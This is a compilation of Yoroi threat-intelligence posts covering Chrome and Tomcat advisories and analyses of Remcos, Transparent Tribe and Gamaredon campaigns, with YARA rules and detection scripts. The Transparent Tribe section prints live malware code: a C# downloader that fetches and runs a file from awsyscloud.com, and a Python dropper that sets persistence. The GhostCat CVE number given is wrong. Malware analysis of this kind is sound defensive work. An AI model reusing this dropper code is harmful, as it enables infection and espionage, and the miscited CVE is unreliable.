0-Day Vulnerability in Google Chrome

Proto: N060220.

Yoroi hereby wishes to inform you of a 0-day vulnerability discovered in Google Chrome, the most widespread web browser among private users and one of the most used in professional environments as well. The issue is tracked under the identifier CVE-2020-6418.

The problem is caused by flaws in the handling of data types inside Google Chrome's V8 JavaScript engine. This allows a remote attacker to execute arbitrary code on the target system once the victim browses malicious or compromised web pages, opening up risk scenarios tied to "Watering Hole" or "Exploit Kit" attacks.

The vendor has confirmed the issue by releasing browser version 80.0.3987.122 for Windows, Linux and Mac systems, which fixes the problem.

Researchers from the GTAG have also confirmed that the vulnerability is currently being exploited in 0-day attack operations; therefore, given the browser's potential spread inside corporate networks as well, Yoroi strongly recommends applying the security patches made available by the vendor to the client machine fleet.

Finally, Yoroi recommends keeping users' awareness level high, periodically alerting them to ongoing threats, and relying on a team of experts to safeguard the security of the "cyber" perimeter. For a real-time threat index, please visit the following link: Yoroi Cyber Security Index.

New Cyber Attack Campaign Leverages the COVID-19 Infodemic

Introduction

Nowadays it is commonly said that the physical world and the cyber world are tightly connected. The proof is the use of the current physical threat, the Coronavirus, as a social engineering lure to infect the cyber world. It is nothing new for cyber-crooks to exploit social phenomena to spread malware in order to maximize the impact and reach of a malicious campaign. This was the case with the Greta Thunberg phenomenon exploited in recent Emotet campaigns, or the holiday-themed campaign spread a few months ago.

Indeed, during the last month a new virus, dubbed "Corona Virus" with codename COVID-19, has been spreading, infecting thousands of people in China and all around the world.

The statistics are worrying and, of course, they represent an opportunity for cyber-crooks. This kind of threat is opportunistic by design, aimed at hitting everyone without any specific target. In an opportunistic attack scenario the malware is spread across a huge number of victims, taking advantage either of a recently disclosed vulnerability and the time frame needed to patch it, or of a widespread phenomenon, as in this case.

Threat actors are using the fear and panic caused by the spread of the virus to deliver their malicious artifacts and increase the number of infected victims, disguising the malware as a "Coronavirus countermeasures" document.

Kaspersky and IBM X-Force have recently discovered an Emotet campaign riding the Coronavirus trend. In this case, based on the analysis of the shared IoCs, none of the identified samples are new: they were reused with some small changes and then delivered in Chinese regions via a malicious decoy document, emphasizing the opportunistic nature of these attacks.

During our Threat Intelligence activities we noticed a suspicious artifact named "CoronaVirusSafetyMeasures_pdf", so, intrigued by its name and by its recent submission on Yomi Hunter, we decided to dive deep into it.

Technical Analysis

Probably, the infection vector was a phishing email containing a specific attachment. However, detailed information about the vector used to spread the malware is unknown. Our analysis, therefore, begins with the executable recovered from the Yomi Sandbox.

Hash: c9c0180eba2a712f1aba1303b90cbf12c1117451ce13b68715931abc437b10cd
Threat: Obfuscated Remcos RAT Dropper
Ssdeep: 768:dBbjxSuO05cYJAsq4XqkDSUWvcDD5Ebcoq:dSuT5cYJAsq4XqkxWID6m

Table 1. Sample information

The sample showed an interesting behavior: it established a TLS-protected connection to a file sharing platform named "share.]dmca.]gripe", possibly to avoid reputation warnings raised by next-gen firewalls.

Figure 2: URL in the dropper configuration

Figure 3: Dashboard of the file hosting service used

The file downloaded from this censorship-free file hosting is actually a chunk of 125KB of random-looking bytes, suggesting it is likely a binary payload protected with strong encryption.

Figure 4: Piece of the encrypted file downloaded from “share.]dmca.]gripe”

In the meantime, the malware writes two artifacts into the "C:\Users\<username>\Subfolder" directory: two files named "filename1.vbs" and "filename1.exe".

Figure 5: Installed files

The content of the VBScript is straightforward: it is simply the launching point to run the executable file.

Figure 6: Body of the VBS script

The infection survives reboots through the setup of the registry key "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce". This classic trick, which we keep noticing in a very large number of malware implants, leads us to think it is still able to serve its malicious purpose even after decades, and even though the whole research community is fully aware of it.

Figure 7: Evidence of the set of the registry key

Then, the malicious code stores the sensitive information gathered by monitoring user keypresses in a file named "logs.dat", placed in the "%AppData%\Local\Temp\onedriv" directory, which differs from the default Remcos working directory.

Figure 8: Path and file containing the sensitive information about the victim 

Finally, all the loot is sent to the remote command and control server hosted at 66.154.98.108, operated by "Total Server Solutions LLC", a US hosting provider operating since 2012.

Figure 9: C2 connection

Intercepting the malware process communications we noticed the use of the "|cmd|" delimiter, a typical pattern confirming that the final payload is a customized build of Remcos, and also revealing the identifier of the attack campaign configured by the crooks: "j8gb-GBATN3".

Figure 10: Piece of network communication intercepted

A summary of the infection chain is represented by the following schema.

Figure 11: Malware attack chain

Conclusion

The COVID-19 phenomenon is scaring entire populations around the world, often raising panic and irrational or dangerous individual behaviors among many people, frequently pushed by mass media narratives designed to leverage their uncertainty and emotional reactions rather than inform them.

Cyber criminals are greedily looking at this kind of narrative and are launching widespread, opportunistic cyber attacks to exploit the irrational behaviors of individuals overwhelmed by the COVID-19 infodemic.

The ZLab-Yoroi Cybaze researchers advise maintaining a high level of attention when receiving or handling communications claiming to be related to the Coronavirus phenomenon, avoiding panic-clicking on links coming from unexpected sources, and contacting trusted experts in case of doubt.

Indicators of Compromise

Yara Rules

import "pe"
rule Remcos_RAT_COVID19_Feb_2020 {
    meta:
      description = "Yara rule for the Remcos RAT Feb_2020 "
      author = "Yoroi - ZLab"
      last_updated = "2020-02-25"
      tlp = "white"
      category = "informational"

    strings:
      $a1 = {ED C3 37 D7 6F C7 E0 2F 7B BA DA}
      $a2 = {4D 53 56 42 56 4D 36 30}
      $a3 = "VB5!6&*"
      $a4 = "Khedivi"
      $a5 = "|dbdU79?B_|"
      $a6 = "Altsaxu1"

    condition:
      uint16(0) == 0x5A4D and pe.number_of_sections == 3 and (3 of ($a*))
}

This blog post was authored by Davide Testa, Maria Francesca Lepore, Antonio Pirozzi and Luca Mella of Cybaze-Yoroi ZLAB

Serious Vulnerability in Apache Tomcat (GhostCat)

Proto: N050220.

Yoroi hereby wishes to inform you of the recent discovery of a serious vulnerability in Apache Tomcat, the well-known application server used to build applications in enterprise environments as well. The issue is known by the alias "GhostCat" and is referenced by the identifiers CVE-2020-1398 and CNVD-2020-10487.

The problem is caused by flaws in the handling of user input within Tomcat's AJP (Apache JServ Protocol) connector, which is used to integrate the application server into load-balanced architectures or behind reverse proxies. These flaws allow an unauthenticated remote attacker to retrieve system configuration files, thereby recovering administrative credentials that can be used to gain unauthorized access to the target servers, compromising their data and the security of local networks. Moreover, the AJP connector is enabled by default in Tomcat configurations on network port 8009.

The maintainer has fixed the issue by releasing new versions of Apache Tomcat 7, 8 and 9, but not of version 6, which is out of support. In particular, the following versions are affected by the vulnerability:

Due to the potential spread of services and applications based on Apache Tomcat, and the recent publication of technical details and tools aimed at exploiting the vulnerability, Yoroi recommends limiting the network exposure of the AJP connector and applying the updates made available by the maintainer.

If patches cannot be applied promptly, Yoroi recommends considering disabling the connector if it is not used, or protecting the connector with a password by adding the "secret" or "requiredSecret" directive to the "/conf/server.xml" configuration file.

Figure. Example configuration of a password-protected AJP connector.
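As an added example (not Yoroi's figure and not a tool shipped with Tomcat), the following Python snippet audits the AJP connectors in a server.xml document and flags any that lack the "secret"/"requiredSecret" directive or that are not bound to a loopback address. The two embedded server.xml fragments are constructed for this example: the first mirrors the unprotected default connector on port 8009, the second the hardened form the advisory recommends. The attribute names are the ones Tomcat documents (requiredSecret on the Tomcat 7/8 line, secret and secretRequired on the patched 8.5/9 line); the secret value is a placeholder.

```python
import xml.etree.ElementTree as ET

# Constructed sample server.xml fragments (not taken from the page).
# Weak: AJP/1.3 connector on 8009, no secret, bound to all interfaces.
WEAK_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" />
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
  </Service>
</Server>"""

# Hardened: loopback only, secretRequired plus a (placeholder) shared secret.
HARDENED_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" />
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="REPLACE_WITH_LONG_RANDOM_SECRET"
               redirectPort="8443" />
  </Service>
</Server>"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def audit_ajp_connectors(server_xml):
    """Return one finding per AJP connector found in a server.xml document.

    Each finding is {"port": str, "problems": [...]} where problems may contain:
      "no_secret" - neither secret nor requiredSecret is configured
      "exposed"   - the connector is not bound to a loopback address
    A connector with an empty problem list passes the check.
    """
    root = ET.fromstring(server_xml)
    findings = []
    for conn in root.iter("Connector"):
        protocol = conn.get("protocol", "HTTP/1.1")
        if not protocol.upper().startswith("AJP"):
            continue
        problems = []
        # 'requiredSecret' is the older attribute name, 'secret' the current one.
        if not (conn.get("secret") or conn.get("requiredSecret")):
            problems.append("no_secret")
        # A missing address attribute means the connector listens on all interfaces.
        if conn.get("address", "") not in LOOPBACK:
            problems.append("exposed")
        findings.append({"port": conn.get("port"), "problems": problems})
    return findings


if __name__ == "__main__":
    for label, doc in (("weak", WEAK_SERVER_XML), ("hardened", HARDENED_SERVER_XML)):
        print(label, audit_ajp_connectors(doc))
```

Run against the real conf/server.xml of each Tomcat instance, the empty problem list is the state to aim for; a connector that is unused should simply be commented out rather than secured, as the advisory suggests, and the check complements the update to a fixed Tomcat release rather than replacing it.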

Finally, Yoroi recommends keeping users' awareness level high, periodically alerting them to ongoing threats, and relying on a team of experts to safeguard the security of the "cyber" perimeter. For a real-time threat index, please visit the following link: Yoroi Cyber Security Index.

Transparent Tribe: Four Years Later

Introduction

Operation Transparent Tribe was first spotted by Proofpoint researchers in February 2016, in a series of espionage operations against Indian diplomats and military personnel in some embassies in Saudi Arabia and Kazakhstan. At that time, the researchers tracked the source IPs to Pakistan; the attacks were part of a wider operation relying on multiple vectors, such as watering hole websites and phishing email campaigns delivering custom RATs dubbed Crimson and Peppy. These RATs are capable of exfiltrating information, taking screenshots and recording webcam streams.

This threat actor vanished for a long period, and only last month did it appear again, probably because of the current tensions between the two countries. We noticed that the TTPs of the group are almost the same, leveraging a weaponized document with a fake request certificate for an Indian public fund. So, the Cybaze-Yoroi ZLab team decided to dive deep into a technical analysis.

Technical Analysis

Hash: 662c3b181467a9d2f40a7b632a4b5fe5ddd201a528ba408badbf7b2375ee3553
Threat: New Operation Transparent Tribe Campaign
Brief Description: Malicious macro document of the new Campaign of Transparent Tribe
Ssdeep: 24576:Nh2axIaansJlyJ1prFnFmbX3ti6iEIb+R9mSXH9tBUnTqHT:Nhfx4nsPyJ1ppnEX3UCICRhXHXe

Table 1. Static information about the malicious macro 

The document presents itself as a request for the DSOP FUND (Defence Services Officers Provident Fund). It is a fund into which an officer compulsorily deposits some money with the Government on a monthly basis out of his wages/salary.

The fund is a financial planning scheme for defense personnel. The money is kept by the government and in return a "non-permanent" profit, officially titled "interest", is given back to the officers at the end of each year. The DSOP fund scheme has been set up as a "welfare measure" for the depositors, whose wages otherwise barely make ends meet.

Self-Extracting Macro

Analyzing the content of the Excel file, we notice that it contains all the components necessary to perform the infection:

The macro is not heavily obfuscated. The macro components are hidden as hex or decimal strings, which are combined with each other to unleash the next stage of the infection.

It is then possible to deobfuscate them.

The macro creates two folders inside the %PROGRAMDATA% path, "systemidleperf" and "SppExtComTel".

Analyzing these files, we find a VBS script, a C# source file and a zip file; inside this archive we found 4 PE artifacts:

The SilentCMD Module

The two DLLs are legitimate Windows libraries used in support of the malicious behaviour. The "windproc.scr" and "windprocx.scr" files, instead, are compiled versions of the SilentCMD utility, publicly available on GitHub. SilentCMD executes a batch file without opening the command prompt window. If required, the console output can be redirected to a log file.

The SilentCMD utility is used to execute the commands pushed from the C2, all of which run without showing anything to the user. However, as previously mentioned, it is curious to notice that the malware installs two different variants of the executable, differing only in their timestamp:

The Real Time Module

The other extracted file is "Realtime.cs", the source of a piece of code written in C#, which is compiled and run during the execution of the macro. The code is very simple and its only purpose is to download another component from the internet:

using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Text;
namespace Realtime
{
    class Program
    {
        static void Main(string[] args)
        {
            
            WebClient wc = new WebClient();
            wc.DownloadFile("http://www.awsyscloud.com/x64i.scr", @"c:\\programdata\\systemidleperf\\x64i.scr");
            Process proc = new Process();
            proc.StartInfo.FileName = Convert.ToString(args[0]);
            proc.StartInfo.Arguments = "/c " + Convert.ToString(args[1]);
            proc.StartInfo.UseShellExecute = false;
            proc.StartInfo.CreateNoWindow = false;
            proc.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            proc.Start();
            Environment.Exit(0);
            //Application.Exit();
            /* if (!proc.Start())
             {
                 //Console.WriteLine("Error starting");
                 return;
             }*/
            //proc.WaitForExit();
        }
    }
}

The code is really simple: it downloads the file "x64i.scr" from the drop URL "awsyscloud[.]com" and saves it into the folder "c:\programdata\systemidleperf\". The file is immediately executed through the C# process primitives.

The X64i.scr File

Hash: 7b455b78698f03c0201b2617fe94c70eb89154568b80e0c9d2a871d648ed6665
Threat: New Operation Transparent Tribe Campaign
Brief Description: Python stub malware of the new Campaign of Transparent Tribe
Ssdeep: 196608:jXm2jfTjEzWt7+eW3TAPHULULN3erOAjsjAbpSzZTfuHO0y7:Lm2jfTgWt65U4UL9eCDHzZfyG7
Icon: PyInstaller icon

Table 2. Static information about the Python stub

The icon of the executable lets us understand that the malware was built using the PyInstaller tool, which allows a user to create a complete self-contained executable starting from Python source code. However, the two main disadvantages of this solution are the high footprint of the executable (more than 7.5MB, which generates a lot of noise inside the system) and the ease with which the executable can be reversed to obtain the source code.

So, after the reversing operation, the extracted code of the malware is the following:

from ctypes import *
import socket, time, os, struct, sys
from ctypes.wintypes import HANDLE, DWORD
import platform
import ctypes
import _winreg
import time
import os
import platform
import binascii
import _winreg
import subprocess

# hex-encoded PE payloads (contents redacted in this listing)
bitstream3 = "PAYLOAD_ONE"
bitstream4 = "PAYLOAD_TWO"
oses = os.name
systems = platform.system()
releases = platform.release()
architectures = platform.architecture()[0]

def main():
  try:
    runsameagain()
  except Exception as e:
    print str(e)

def runsameagain():
    # drop the first payload, set persistence, then launch it
    global bitstream3
    binstr = bytearray(binascii.unhexlify(bitstream3))
    if not os.path.exists("c:\programdata\SppExtComTel"):
        os.makedirs("c:\programdata\SppExtComTel")
    WriteFile("c:\programdata\SppExtComTel\SppExtComTel.scr",binstr);
    bootup()
    subprocess.Popen(["c:\programdata\SppExtComTel\SppExtComTel.scr", '--brilliance'])

def rundifferentagain():
    # same as above, but with the second payload
    global bitstream4
    binstr = bytearray(binascii.unhexlify(bitstream4))
    if not os.path.exists("c:\programdata\SppExtComTel"):
        os.makedirs("c:\programdata\SppExtComTel")
    WriteFile("c:\programdata\SppExtComTel\SppExtComTel.scr",binstr);
    bootup()
    subprocess.Popen(["c:\programdata\SppExtComTel\SppExtComTel.scr", '--brilliance'])

def Streamers():
    try:
        rundifferentagain()
        return 1
    except Exception as e:
        print str(e)

def WriteFile(filename,data):
    with open(filename,"wb") as output:
        output.write(data)

def bootup():
    # persistence: LNK shortcut to the dropped payload in the user's Startup folder
    try:
        from win32com.client import Dispatch
        from win32com.shell import shell,shellcon
        dpath = "c:\programdata\SppExtComTel"
        #print "before"
        Start_path = shell.SHGetFolderPath(0, shellcon.CSIDL_STARTUP, 0, 0)
        com_path = os.path.join(Start_path, "SppExtComTel.lnk")
        target = os.path.join(dpath,"SppExtComTel.scr")
        wDir = dpath
        icon = os.path.join(dpath, "SppExtComTel.scr")
        shell = Dispatch('WScript.Shell')
        shortcut = shell.CreateShortCut(com_path)
        shortcut.Targetpath = target
        shortcut.WorkingDirectory = wDir
        shortcut.IconLocation = icon
        shortcut.save()
        #print "there"
        #return True
    except Exception, e:
        print str(e)

if __name__ == "__main__":
    try:
        #print oses
        #print systems
        #print releases
        #print architectures
        if '.py' not in sys.argv[0]:
            #sys.exit()
            #print "nothign to do"
            # payload selection by Windows release
            if systems == 'Windows' and releases == "7":
                main()
            elif systems == 'Windows' and (releases == "8.1" or releases == "8"):
                Streamers()
            elif systems == 'Windows' and releases == "10":
                #print "Please use a 64 bit version of python"
                #print "entering streamers"
                Streamers()
            else:
                Streamers()
    except Exception as e:
        print str(e)

Code snippet 2 

The Python code is very simple to analyze and explain. The first operation is to declare two global variables, "bitstream3" and "bitstream4". They are the hexadecimal representations of two PE files, which will be examined in depth in the next sections. Which of the two files gets used is chosen according to the Windows OS version, as visible at the bottom of the code.

After that, the script writes the chosen payload into the folder "c:\programdata\SppExtComTel\" and immediately executes it with the parameter "--brilliance". Then the malware guarantees its persistence through the creation of an LNK file inside the Startup folder.
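A stub like the one above carries its PE payloads as long hex string literals, so an analyst can pull them out of the decompiled source without running anything. The following Python 3 helper is an added example, not code from the sample or from Yoroi: it scans a source text for long hex literals, decodes them, keeps the ones that start with the MZ DOS header and reports the offset of the PE signature. The embedded source text is constructed for the example, with tiny fake PE headers standing in for the real bitstream3/bitstream4 blobs.

```python
import re
import binascii

# Constructed stand-in for a decompiled stub: a minimal fake DOS/PE header
# (MZ, e_lfanew at 0x3C pointing to "PE\0\0") instead of a real executable.
FAKE_PE = (b"MZ" + b"\x90" * 58 + (0x40).to_bytes(4, "little")
           + b"PE\x00\x00" + b"\x00" * 20)

STUB_SOURCE = '''
bitstream3 = "%s"
bitstream4 = "%s"
not_a_payload = "deadbeef"
''' % (FAKE_PE.hex(), (b"not a PE file, just bytes" * 4).hex())

# A name, '=', and a double-quoted run of at least 64 hex characters.
HEX_LITERAL = re.compile(r'(\w+)\s*=\s*"([0-9a-fA-F]{64,})"')


def extract_embedded_pes(source):
    """Return {variable_name: bytes} for every long hex literal in `source`
    that decodes to data starting with the MZ header."""
    found = {}
    for name, hexstr in HEX_LITERAL.findall(source):
        if len(hexstr) % 2:          # odd-length hex cannot be a byte string
            continue
        try:
            blob = binascii.unhexlify(hexstr)
        except binascii.Error:
            continue
        if blob[:2] == b"MZ":
            found[name] = blob
    return found


def pe_header_offset(blob):
    """Return e_lfanew (offset of the 'PE\\0\\0' signature), or None if the
    blob is not a well-formed DOS/PE header."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return None
    off = int.from_bytes(blob[0x3C:0x40], "little")
    if blob[off:off + 4] != b"PE\x00\x00":
        return None
    return off


if __name__ == "__main__":
    for name, blob in extract_embedded_pes(STUB_SOURCE).items():
        print(name, len(blob), "bytes, PE header at", pe_header_offset(blob))
```

On the real sample the decoded blobs are the two RAT variants selected by Windows release, so the next step would be to write each one to disk under its variable name and hash it for the IoC list rather than execute it.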

The RAT

As previously stated, the malware payload is the core component of the malware implant.

As shown in the above figure, the malware is written for the .NET framework and its creation date goes back to 29 Jan 2020. That is the date of the beginning of the malware campaign, as also demonstrated by the registration records of the C2. The malware consists of a modular implant that downloads other components from the C2.

The first operation is to provide to the C2 a list of the running processes on the victim machine: 

The method used to send the information to the C2 is the following:

Figure 11: C2 communication routine

After that, the malware loops and waits for commands coming from the C2:

Figure 12: Routine for the download of new modules

When the C2 sends commands to instruct the bot, the malware downloads and executes two further components, two DLLs downloaded from the following URLs:

The first DLL, once executed, is renamed "indexerdervice.dll". This executable has a sophisticated encryption method for its communication with the C2:

Figure 13: Evidence of the decrypting routine of the certificate

The above screen shows that the malware requests an RSA key, which has to be validated against the highlighted text. If the check passes, the malware can proceed with its malicious actions, such as sending information:

Figure 14: Sending routine of the malware

The second malware module is a simple DLL whose purpose is to download other components from the drop URL and then install them:

Figure 15: Evidence of the hard coded AES key

The downloaded code is encrypted with the Rijndael algorithm using a hard-coded key.

Conclusion

Transparent Tribe is back with a new campaign after several years of (apparent) inactivity. We can confirm that this campaign is completely new, relying on the registration record of the C2 that dates back to 29 January 2020. The decoy document presents itself as a request for the DSOP FUND (Defence Services Officers Provident Fund), a provident fund for officers and military personnel, confirming the espionage and counterintelligence character of this campaign.

Finally, we have no certainty that this campaign has been inactive for 4 years; it may be that the group acted quietly, but now the cyber criminal group is back in view of today's tensions between the two countries.

Indicators of Compromise

Yara Rules

rule TransparentTribe_Malicious_Macro_Jan_2020 {
    meta:
      description = "Yara rule for the Transparent Tribe Malicious Macro Jan_2020 "
      author = "Yoroi - ZLab"
      last_updated = "2020-02-21"
      tlp = "white"
      category = "informational"
    strings:
      $a1 = {8B 92 BC BE 87 95 BF BD 83}
      $a2 = {D6 8C C7 68 D5 8D C0 69 D4 8E}
      $b1 = "161,36,31,130,137,165,44,167,244,55,198,100,241"
    condition:
      all of them
}

rule TransparentTribe_PythonStub_Jan_20 {
    meta:
      description = "Yara rule for the Transparent Tribe Python Stub Jan_2020 "
      author = "Yoroi - ZLab"
      last_updated = "2020-02-21"
      tlp = "white"
      category = "informational"
    strings:
      $a1 = {70 56 6B 77 86 FB D2 6D 2C}
      $a2 = {A2 43 F9 97 61 F4 E5 1F D7 02}
      $b1 = "bpyexpat.pyd"
      $b2 = "bmfc90u.dll"

    condition:
      uint16(0) == 0x5A4D and all of them and filesize > 7MB
}

rule TransparentTribe_CrimsonRAT_Jan_20 {
    meta:
      description = "Yara rule for the Transparent Tribe CrimsonRAT Jan_2020 "
      author = "Yoroi - ZLab"
      last_updated = "2020-02-21"
      tlp = "white"
      category = "informational"
    strings:
      $a1 = {03 06 11 24 03 06 11 20 03}
      $a2 = {B0 3F 5F 7F 11 D5 0A 3A 04}
      $b1 = "SppExtComTel"

    condition:
      uint16(0) == 0x5A4D and all of them and filesize > 7MB
}

rule TransparentTribe_MaliciousDLLModule_Jan_20 {
    meta:
      description = "Yara rule for the Transparent Tribe CrimsonRAT Jan_2020 "
      author = "Yoroi - ZLab"
      last_updated = "2020-02-21"
      tlp = "white"
      category = "informational"
    strings:
      $a1 = {00 F1 01 8D 19 71 00 F1 01 7D 06 71}
      $a2 = {86 08 4E 03 57 00 59 00 CC}
      $a3 = "6f6e6c79706172616e6f696473757276697665" ascii wide
      $a4 = "shemypolandar*kotlin" ascii wide
      $b1 = "FC4302A8973108F7B86565D5A49182DED2B0BF31"
      $b2 = "PrivateMemorySize64"
      $b3 = "Hi0-78LoupIks2jMn" wide
    condition:
      uint16(0) == 0x5A4D and (all of ($a*) or all of ($b*))
}

This blog post was authored by Luigi Martire, Pietro Melillo and Antonio Pirozzi of Cybaze-Yoroi ZLAB

New Ursnif Attack Campaign

Proto: N040220.

Yoroi hereby wishes to inform you of a new attack campaign underway against Italian companies and users. The attacks manifest themselves through fraudulent legal-themed emails inviting victims to download and view the contents of an infected compressed archive.

Once opened, the archive is potentially able to compromise the target machine by installing malware of the Ursnif family (TH-196), capable of intercepting user keystrokes and active web sessions, providing backdoor access and downloading further malware.

In particular, the Ursnif variant propagated during the campaign is digitally signed by a Slovenian company. This circumstance may increase the attack's probability of success.

The indicators of compromise extracted during the analyses are reported below:

Finally, Yoroi recommends keeping users' awareness level high, periodically alerting them to ongoing threats, and relying on a team of experts to safeguard the security of the "cyber" perimeter. For a real-time threat index, please visit the following link: Yoroi Cyber Security Index

Launching the First “Yomi Hunting” Challenge!

About a year ago, we publicly released the Yomi Hunter sandbox for a few simple reasons: at Yoroi we believe in the value of the InfoSec community, we think it plays a central role in the fight against cyber-threats, and we feel the need to support it.

Our sentiment regarding the InfoSec community led us to support the Italian CTF team on their path to the final round of the European Cyber Security Challenge tournament last year. But we also love to create things, so we were the first Italian private company to launch and maintain a public instance of the sandbox technology we developed over the years.

It was natural for us to try to give back something to the community we believe in, concretely.

Today is different. 

Today, we'd love to challenge the malware community with the first "Yomi Hunting" contest: literally, a malware and threat hunting contest with a simple and straightforward goal, hunt the bad guys.

So we are inviting malware analysts, security professionals and community researchers to feed the Yomi boxes with good malware and to stay in touch with the Yoroi Twitter account to work with us and the other good guys.

Of course, as with every contest, "Yomi Hunting" has some cool prizes too, such as the possibility of publishing a joint malware research with our Z-LAB, along with awards and other fun stuff we will ship to the most active researchers participating in the contest.

Well, how to participate?

It's quite simple: just go to the Yomi Hunter registration page, create a free community account, submit interesting samples, get in touch with us on our socials and share your findings, or just include the "#yomihunter" hashtag in your tweets.

How does it work?

The contest will start on 17 February 2020 and will end on 31 March 2020. At the end of the contest, the three most active researchers, i.e. those who submitted the most samples, will be rewarded with:

  1. First prize: backpack, shirt, agenda and gadgets
  2. Second place: shirt, agenda and gadgets
  3. Third place: agenda and gadgets

Every participant can monitor the ranking through the Yomi Hunter "Wall of Fame" here.

~

Happy Hunting!

~

To join Yomi: The Malware Hunter and the "Yomi Hunting" contest sign in here!

Cyberwarfare: A deep dive into the latest Gamaredon Espionage Campaign

Introduction 

Gamaredon Group is a persistent cyber espionage operation attributed to the Russian FSB (Federal Security Service), part of a long-term military and geopolitical confrontation against the Ukrainian government and, more generally, against Ukrainian military power.

Gamaredon has been active since 2014, and during this time its modus operandi has remained almost the same. The most used malware implant is dubbed Pteranodon or Pterodo and consists of a multistage backdoor designed to collect sensitive information or maintain access on compromised machines. It is distributed in spear phishing campaigns with a weaponized Office document that appears designed to lure military personnel.

In recent months, the Ukrainian CERT (CERT-UA) reported an intensification of Gamaredon cyberattacks against military targets. The new wave dates back to the end of November 2019 and was first analyzed by Vitali Kremez. Starting from those findings, the Cybaze-Yoroi ZLab team decided to dive deep into a technical analysis of the latest Pterodo implant.

Technical Analysis

The complex infection chain begins with a weaponized Office document named "f.doc". The following table provides the initial malware information.

Hash: 76ea98e1861c1264b340cf3748c3ec74473b04d042cd6bfda9ce51d086cb5a1a
Threat: Gamaredon Pteranodon weaponized document
Brief Description: Doc file weaponized with Exploit
Ssdeep: 768:u0foGtYZKQ5QZJQ6hKVsEEIHNDxpy3TI3dU4DKfLX9Eir:uG1aKQ5OwCrItq3TgGfLt9r

Table 1. Information about initial dropper

The decoy document is written in the Ukrainian language mixed with many special characters, aimed at luring the target into clicking on it; once opened, it appears as in the following figure.

Figure 1. Overview of the document

The document leverages the common exploit known as template injection and tries to download a second stage from "hxxp://win-apu.]ddns.]net/apu.]dot".

Figure 2. URL used by document to download the second stage

Thanks to this exploit (a Remote Code Execution exploit), user interaction is not required; in fact, the "enable macro" button is not shown. The downloaded document has a ".dot" extension, used by Microsoft Office to save templates for different documents with similar formats. Basic information on the ".dot" file is provided:

Hash: e2cb06e0a5c14b4c5f58d0e56a1dc10b6a1007cf56c77ae6cb07946c3dfe82d8
Threat: Gamaredon Pteranodon loader dot file
Brief Description: Dot file enabling the infection of the Gamaredon Pteranodon
Ssdeep: 768:5KCB8tnh7oferuHpC0xw+hnF4J7EyKfJ:oI8XoWruHpp/P4

Table 2. Information about second stage

If we open the document, we see that it is empty, but it requires the macro to be enabled.

Figure 3. Overview of the second stage document

The body of the macro can be logically divided into two distinct parts: 

Figure 4. Code of the “template.vbs” stored in the Startup folder

The evidence of the written file in the Startup folder:

Figure 5. Evidence of the “template.vbs” file in the Startup folder

Analyzing the content of "templates.vbs" it is possible to notice that it defines a variable containing a URL like "hxxp://get-icons.]ddns.]net/ADMIN-PC_E42CAF54//autoindex.]php", obtained from "hxxp://get-icons.]ddns.]net/" & NlnQCJG & "_" & uRDEJCn & "//autoindex.]php", where "NlnQCJG" is the name that identifies the computer on the network and "uRDEJCn" is the serial number of the drive in hexadecimal encoding. From this URL it tries to download another stage, storing it into the "C:\Users\admin\AppData\Roaming\" path with a random name. At the end, the "templates.vbs" script forces the machine to reboot.
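Because the beacon URL is built from the computer name and the drive serial, its shape is a usable detection signal even when the attacker moves to a new domain. The following Python snippet is an added example, not part of Yoroi's analysis: it runs over a few constructed proxy log lines and alerts on either a domain from this post (get-icons.ddns.net, win-apu.ddns.net, shown refanged) or the structural pattern "<hostname>_<8 hex chars>//autoindex.php" on any domain, extracting the victim hostname and volume serial from the match. The log line format is an assumption made for the example.

```python
import re
from urllib.parse import urlsplit

# Constructed proxy log lines (not from the page): timestamp, client, method, URL, status.
SAMPLE_LOG = """\
2019-11-28T09:12:03Z 10.0.0.15 GET http://get-icons.ddns.net/ADMIN-PC_E42CAF54//autoindex.php 200
2019-11-28T09:12:05Z 10.0.0.15 GET http://www.example.com/index.html 200
2019-11-28T09:13:11Z 10.0.0.22 GET http://win-apu.ddns.net/apu.dot 200
2019-11-28T09:14:40Z 10.0.0.31 GET http://cdn.example.net/WORKSTATION7_1A2B3C4D//autoindex.php 404
"""

# Assumed log layout for this example: five whitespace-separated fields.
LOG_LINE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>\S+) (?P<url>\S+) (?P<status>\d+)$")

# Beacon path shape from the post: hostname, "_", 8-hex-digit drive serial, "//autoindex.php".
BEACON_PATH = re.compile(r"/(?P<host>[A-Za-z0-9\-]+)_(?P<serial>[0-9A-Fa-f]{8})//autoindex\.php$")

# Domains named in the analysis (refanged); treat as known C2 infrastructure.
KNOWN_DOMAINS = {"get-icons.ddns.net", "win-apu.ddns.net"}


def detect_beacons(log_text):
    """Return one alert dict per log line that hits a known domain and/or the
    beacon path pattern. Alerts carry the source IP, host, reasons, and the
    victim hostname and drive serial when the structural pattern matched."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line.strip())
        if not m:
            continue  # skip malformed lines rather than failing the whole run
        parts = urlsplit(m.group("url"))
        host = parts.hostname or ""
        reasons = []
        if host in KNOWN_DOMAINS:
            reasons.append("known_c2_domain")
        pm = BEACON_PATH.search(parts.path)
        if pm:
            reasons.append("beacon_path")
        if reasons:
            alerts.append({
                "src": m.group("src"),
                "host": host,
                "reasons": reasons,
                "victim": pm.group("host") if pm else None,
                "serial": pm.group("serial").upper() if pm else None,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_beacons(SAMPLE_LOG):
        print(alert)
```

The structural match is the more durable of the two checks: the fourth sample line hits it on a domain that is not in the list, while the third line (the template download) is caught only by the domain indicator, so both are worth keeping.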

Figure 6. Function used to force machine reboot

The dropped sample is an SFX archive, in the tradition of Gamaredon implants.

Hash: c1524a4573bc6acbe59e559c2596975c657ae6bbc0b64f943fffca663b98a95f
